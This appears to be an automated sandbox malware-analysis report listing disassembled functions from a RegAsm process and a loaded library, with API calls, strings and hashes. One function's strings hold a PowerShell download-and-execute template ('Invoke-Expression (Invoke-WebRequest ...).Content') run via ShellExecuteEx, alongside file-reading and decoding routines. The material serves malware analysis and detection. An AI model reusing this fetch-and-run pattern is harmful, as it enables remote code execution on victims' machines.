                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D1E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6D1EC1
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1EE1
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744), ref: 6C6D1F38
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744), ref: 6C6D1F5C
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C6D1F83
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FC0
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FE2
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6D1FF6
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D2019
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                                                    • String ID: Dul$Dul$MOZ_CRASH()$\ul
                                                                                                                                                                                                                                                    • API String ID: 2055633661-1337673199
                                                                                                                                                                                                                                                    • Opcode ID: 8fbc935a508c4fb2d78f30aceecfeb76bbe9d5ab2ce65bba58bce9abcae7fb93
                                                                                                                                                                                                                                                    • Instruction ID: ced5035632091a739b327957027f5c914945efef43d13a2b804499c554eaadbf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbc935a508c4fb2d78f30aceecfeb76bbe9d5ab2ce65bba58bce9abcae7fb93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F341DFB1B043198FDF018F78C988BAA3BB5EB4A318F450539E90597741DFB5A8048BDA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6F5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6F56D1
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6F56E9
                                                                                                                                                                                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6F56F1
                                                                                                                                                                                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C6F5744
                                                                                                                                                                                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6F57BC
                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C6F58CB
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F58F3
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6F5945
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F59B2
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C75F638,?,?,?,?), ref: 6C6F59E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                    • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                    • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                    • Opcode ID: 88dd8d7446754008c7545782d70357fffc4fb5e41d273feec51dee8beaa19144
                                                                                                                                                                                                                                                    • Instruction ID: 76d220d15a56a991f2cacc85ccb35eafe8e1bcc580d128edcce196fef2ce36da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88dd8d7446754008c7545782d70357fffc4fb5e41d273feec51dee8beaa19144
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2C18E31A097809FD705DF28C44066ABBF1FFDA714F45CA2DE8D497660DB30A986CB86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EC84
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71EC8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71ECA1
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ECAE
                                                                                                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C71ECC5
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ED0A
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C71ED19
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C71ED28
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71ED2F
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71ED59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C71EC94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                    • Opcode ID: 747d30945f81ad9d30d59fc25891f4dc1bf8fa7b8b48119335b7ec217ec43f61
                                                                                                                                                                                                                                                    • Instruction ID: 5e9ba87c79197d5ab28d4b11e237a578d7d6518358f1d43a3714d86bd6ce7b18
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 747d30945f81ad9d30d59fc25891f4dc1bf8fa7b8b48119335b7ec217ec43f61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5321E575604108ABDF019F64D90DAAA777AEF4636CF984231FC2897F40DF31AC168BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C735FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C736009
                                                                                                                                                                                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C736024
                                                                                                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qml,?), ref: 6C736046
                                                                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?,Qml,?), ref: 6C736061
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C736069
                                                                                                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C736073
                                                                                                                                                                                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C736082
                                                                                                                                                                                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C75148E), ref: 6C736091
                                                                                                                                                                                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qml,00000000,?), ref: 6C7360BA
                                                                                                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7360C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                                                                                                    • String ID: Qml
                                                                                                                                                                                                                                                    • API String ID: 3835517998-3226739177
                                                                                                                                                                                                                                                    • Opcode ID: 7bd5b1bf3cd1286be320b01e27cc218ab0e6b0eba25ae45a7e9dac3387f1818f
                                                                                                                                                                                                                                                    • Instruction ID: 855bf38540982b72269dec1f450b2a7d5bb5ca50f4a3eb4655533b0977097ac4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd5b1bf3cd1286be320b01e27cc218ab0e6b0eba25ae45a7e9dac3387f1818f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21B2B1A002189FDB105F24DC09AAA7BB8FF45218F408438E85AD7281CF75BA59CFD5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00413610 Relevance: 18.2, APIs: 12, Instructions: 207stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413643
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413655
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00413681
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D20F0), ref: 004136A0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004136B4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D2018), ref: 004136C8
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 004117F0: GlobalAlloc.KERNEL32(00000000,Y7A,?,?,?,00413759,?,?), ref: 004117FB
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D23F0), ref: 00413765
                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0041383A
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004137DE
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042717D,?,?,?,?,000003E8), ref: 004137FB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00413816
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274DC), ref: 00413822
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4228189460-0
                                                                                                                                                                                                                                                    • Opcode ID: 730461f6d4f296029eb596b3e359c770bc36bcc04cdaa6c0a4af3b74bb9cd58d
                                                                                                                                                                                                                                                    • Instruction ID: 60534eda8287e98b898d0e3664bec52c239fb42f48bc9c26b5b1b3f58eb20c38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 730461f6d4f296029eb596b3e359c770bc36bcc04cdaa6c0a4af3b74bb9cd58d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4371A8B5D00219ABCB10EFA5CC85EEE7779AF58704F00456EF605B3281DB78AB44CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00412FE0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004133BA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                    • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    • API String ID: 2215929589-186952963
                                                                                                                                                                                                                                                    • Opcode ID: 03dd2e9e34d802dea5d29cfa6423f1f3d9152ac0f25e9dd2332ea9cdd86388b5
                                                                                                                                                                                                                                                    • Instruction ID: 4104a353c020ab22266f5ef7065de420a7a79c03b59ae824b4d38d852fc73c37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03dd2e9e34d802dea5d29cfa6423f1f3d9152ac0f25e9dd2332ea9cdd86388b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD17F31C15248EACB15EBE5C956ADEBBB86F14304F1040BEE506336D2DA782B0CDB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C718ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6DEB83
                                                                                                                                                                                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?), ref: 6C7191F4
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                                                    • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                                                    • Opcode ID: d737a34b18cb1ea126b6bb58bb739ead5cf3a26ce5104cadd4e9a211eba5211c
                                                                                                                                                                                                                                                    • Instruction ID: 26d6235346672248b6bd1c89472aa045343425de2d87781c27fd36c9b2dccc20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d737a34b18cb1ea126b6bb58bb739ead5cf3a26ce5104cadd4e9a211eba5211c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BB104B0A0520A9BDB04CF94C6917EEBBB5FF95318F148029D401ABF80DB31E955CBD4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6FC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6FC5A3
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C6FC9EA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C6FC9FB
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C6FCA12
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6FCA2E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6FCAA5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
